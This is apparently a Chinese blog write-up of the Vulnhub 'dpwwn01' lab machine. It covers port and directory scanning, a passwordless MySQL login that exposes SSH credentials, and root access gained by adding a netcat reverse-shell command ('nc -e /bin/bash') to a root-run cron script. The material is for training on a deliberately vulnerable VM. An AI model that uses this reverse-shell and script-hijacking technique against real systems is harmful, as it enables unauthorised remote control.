首页 > 其他分享 >Vulnhub-dpwwn01-WP

Vulnhub-dpwwn01-WP

时间:2023-05-07 18:33:45浏览次数:48  
标签:20.131 http 17 51 192.168 dpwwn01 403 Vulnhub WP

前言

点击>>下载靶机
靶机
image
kali linux :ip地址为192.168.20.200

靶机探测

使用nmap探测靶机

nmap 192.168.20.0/24

image

靶机ip为192.168.20.131

使用nmap进行详细扫描

nmap -A -p- 192.168.20.131

点击查看扫描结果
root in /home/kali via ☕ v17.0.6 …
➜ nmap -A -p- 192.168.20.131
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-07 17:37 CST
Nmap scan report for 192.168.20.131
Host is up (0.00064s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 c1d3be39429d5cb4952c5b2e20590e3a (RSA)
|   256 434ac610e7177da0c0c376881d43a18c (ECDSA)
|_  256 0ecce3e1f78773a10347b9e2cf1c9315 (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Apache HTTP Server Test Page powered by CentOS
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
3306/tcp open  mysql   MySQL 5.5.60-MariaDB
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.60-MariaDB
|   Thread ID: 4
|   Capabilities flags: 63487
|   Some Capabilities: DontAllowDatabaseTableColumn, ODBCClient, IgnoreSigpipes, Speaks41ProtocolOld, LongColumnFlag, SupportsCompression, InteractiveClient, SupportsLoadDataLocal, SupportsTransactions, LongPassword, ConnectWithDatabase, Support41Auth, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, FoundRows, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: 29gxJGb;>ec@Uj5i3`io
|_  Auth Plugin Name: mysql_native_password
MAC Address: 00:0C:29:93:02:FA (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.64 ms 192.168.20.131

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.99 seconds

nmap漏洞扫描

nmap -p22,80,3306 --script=vuln 192.168.20.131

点击查看扫描结果
root in /home/kali via ☕ v17.0.6 …
➜ nmap -p22,80,3306 --script=vuln 192.168.20.131    
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-07 17:42 CST
Nmap scan report for 192.168.20.131
Host is up (0.00035s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-trace: TRACE is enabled
| http-enum: 
|   /info.php: Possible information file
|_  /icons/: Potentially interesting folder w/ directory listing
3306/tcp open  mysql
MAC Address: 00:0C:29:93:02:FA (VMware)

Nmap done: 1 IP address (1 host up) scanned in 112.40 seconds
发现并没有可进行利用的漏洞

网站信息收集

image
是一个默认页面对其进行目录扫描

目录扫描

dirb http://192.168.20.131/

点击查看扫描结果
root in /home/kali via ☕ v17.0.6 …
➜ dirb http://192.168.20.131/      

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun May  7 17:45:18 2023
URL_BASE: http://192.168.20.131/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.20.131/ ----
+ http://192.168.20.131/cgi-bin/ (CODE:403|SIZE:210)                                                                                                                    
+ http://192.168.20.131/info.php (CODE:200|SIZE:47545)                                                                                                                  
                                                                                                                                                                        
-----------------
END_TIME: Sun May  7 17:46:06 2023
DOWNLOADED: 4612 - FOUND: 2

挨个访问一下
cgi-bin/
image

info.php
image
在info.php中查询一番无果,换个工具对其继续进行目录扫描

dirsearch -u http://192.168.20.131/

点击查看扫描结果
root in /home/kali via ☕ v17.0.6 took 47.7s …
➜ dirsearch -u http://192.168.20.131/                    

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10930

Output File: /root/.dirsearch/reports/192.168.20.131/-_23-05-07_17-51-13.txt

Error Log: /root/.dirsearch/logs/errors-23-05-07_17-51-14.log

Target: http://192.168.20.131/

[17:51:14] Starting: 
[17:51:16] 403 -  213B  - /.ht_wsr.txt
[17:51:16] 403 -  216B  - /.htaccess.orig
[17:51:16] 403 -  216B  - /.htaccess.save
[17:51:16] 403 -  218B  - /.htaccess.sample
[17:51:16] 403 -  216B  - /.htaccess.bak1
[17:51:16] 403 -  217B  - /.htaccess_extra
[17:51:16] 403 -  214B  - /.htaccess_sc
[17:51:16] 403 -  214B  - /.htaccessOLD
[17:51:16] 403 -  214B  - /.htaccessBAK
[17:51:16] 403 -  216B  - /.htaccess_orig
[17:51:16] 403 -  206B  - /.htm
[17:51:16] 403 -  215B  - /.htaccessOLD2
[17:51:16] 403 -  207B  - /.html
[17:51:16] 403 -  212B  - /.htpasswds
[17:51:16] 403 -  216B  - /.htpasswd_test
[17:51:16] 403 -  213B  - /.httr-oauth
[17:51:35] 403 -  210B  - /cgi-bin/
[17:51:45] 200 -   47KB - /info.php

Task Completed

弱口令爆破

mysql

image
mysql是没有设置密码的

查看数据库

image

查看ssh数据库

image

查看用户表

image
发现ssh用户账号密码
账号:mistic
密码:testP@$$swordmistic

登录靶机

使用在数据库中查询到的账号密码直接登录靶机
ssh [email protected]
image

靶机信息收集

查看权限
image
查看网卡信息
image
查看用户目录信息
image
只有一个脚本,发现是无用户flag的
image
同样根目录和家目录都没有flag

提权

查看系统内核信息
uname -a
image
查看当前用户可以无密码使用什么命令
sudo -l
image
发现并不能直接运行
回到mistic目录下查看脚本

image
image
可以发现是写入后台进程的而且直接可以拿到root权限,我们更改一下脚本
将反弹shell命令写入logrot.sh脚本中
nc -e /bin/bash 192.168.20.200 6666

image
kali开启监听
image
等待3分钟即可收到反弹shell
image
成功拿到反弹shell,并且权限为root
使用python提高一下shell的交互性

python -c "import pty;pty.spawn('/bin/bash')"

image

进入root目录查看flag
image

点击查看flag
[root@dpwwn-01 ~]# cat dpwwn-01-FLAG.txt
cat dpwwn-01-FLAG.txt

Congratulation! I knew you can pwn it as this very easy challenge. 

Thank you. 


64445777
6e643634 
37303737 
37373665 
36347077 
776e6450 
4077246e
33373336 
36359090

标签:20.131,http,17,51,192.168,dpwwn01,403,Vulnhub,WP
From: https://www.cnblogs.com/zy4024/p/Vulnhub-dpwwn01-WP.html

相关文章

  • Vulnhub: InfoSec Prep:OSCP靶机
    kali:192.168.111.111靶机:192.168.111.130信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.130访问80端口下的robots.txt文件,内容提示另一个文件/secret.txtsecret.txt文件内容为base64加密的字符串,解密后发现是ssh私钥echo'LS0tLS1CRUdJTiBPU......
  • 【WPF】-MVVM-封装窗口管理器解耦在ViewModel中弹出窗口
    一.在ViewModel层直接调用View弹出窗体如下图所示,这样做就发生了在ViewModel层直接使用了View,两者产生了耦合,ViewModel里是不应该包含View的,这不是我们期望的。 二.封装窗口管理器解耦在ViewModel中调用View2.1.封装窗口管理器延迟了对象的创建,先把类型(对象的模板)注册进来,......
  • cryptohack wp day(4)
    接上题第五题(ModularInverting)在模运算中,如果我们要解决形如a*x≡bmodm的方程,其中a,b,m是已知整数,x是未知整数,我们可以使用扩展欧几里得算法来找到x的值。但是,如果m是一个质数,我们可以使用费马小定理来计算a的逆元,即a关于模m的倒数。具体来说,如果p是一个素数,a是p的倍数之......
  • WPS基础使用指南
    WPS是一款非常常用的办公软件,包含了WPS文字、WPS表格、WPS演示三个模块。以下是WPS基础使用知识:1.启动WPS在电脑桌面找到WPS的图标,双击打开即可。或者在开始菜单中搜索WPS,点击打开。也可以直接双击文档、表格、演示等格式的文件,WPS会自动打开对应的模块。2.WPS文字的快捷键快捷键......
  • Vulnhub之Funbox 4靶机详细测试过程(提权成功)
    Funbox4靶机信息名称:Funbox:CTFURL:https://www.vulnhub.com/entry/funbox-ctf,546/识别靶机IP地址将靶机导入VirtualBox。配置其网卡为主机模式配置。启动KaliLinux和靶机。内置netdiscovery工具可以将靶机的IP地址识别为192.168.56.150。(kali㉿kali)-[~/D......
  • Web|[SWPUCTF 2018]SimplePHP
    访问是一个文件上传页面,点击查看文件页面可以发现特殊的链接,应该存在文件包含http://dfef288e-1b73-48e0-9458-a4e733c40c38.node4.buuoj.cn:81/file.php?file=查看源码发现一些文件,页面内容提示flag在f1ag.php中index.phpfile.phpupload_file.phpf1ag.php直接包含f1a......
  • wordpress插件:WPFront Scroll Top返回顶部(WPFront Scroll Top 2.0.7.08086 / wordpr
     一,安装插件/设置插件:插件->安装插件->用top关键字进行搜索,然后选择WPFrontScrollTop点立即安装按钮安装完成后,点启用按钮选中前两项选中前两项后,点保存更改按钮二,测试效果说明:刘宏缔的架构森林是一个专注架构的博客,地址:https://www.cnblogs.com/architec......
  • WPF项目中使用WInform版本的 ChromiumWebBrowser控件嵌套网页 解决中文输入法候选框定
    创建一个用户控件,后台代码:publicpartialclassCefControl:UserControl{ChromiumWebBrowserwebView=null;publicCefControl(){InitializeComponent();if(!CefSharp.Cef.IsInitialized){......
  • 界面控件DevExpress WPF富文本编辑器,让系统拥有Word功能(二)
    DevExpressWPF控件的富文本编辑器允许开发者将文字处理功能集成到下一个WPF项目中,凭借其全面的文本格式选项、邮件合并以及丰富的终端用户选项集合,可以轻松地提供MicrosoftWord功能。DevExpressWPF拥有120+个控件和库,将帮助您交付满足甚至超出企业需求的高性能业务应用程序。......
  • Material Design WPF DialogHost 实现异步关闭
    在撰写一个按钮处理数据同步的事件时,处理前先弹出一个窗口,告知用户正在处理数据,处理数据后再关闭这个弹窗。 Button按钮的事件代码原先是这样,预想中是处理一些事情后,可以自动关闭弹窗。DialogHost_MySelf就是DialogHost。1this.DialogHost_MySelf.IsOpen=true;2/**......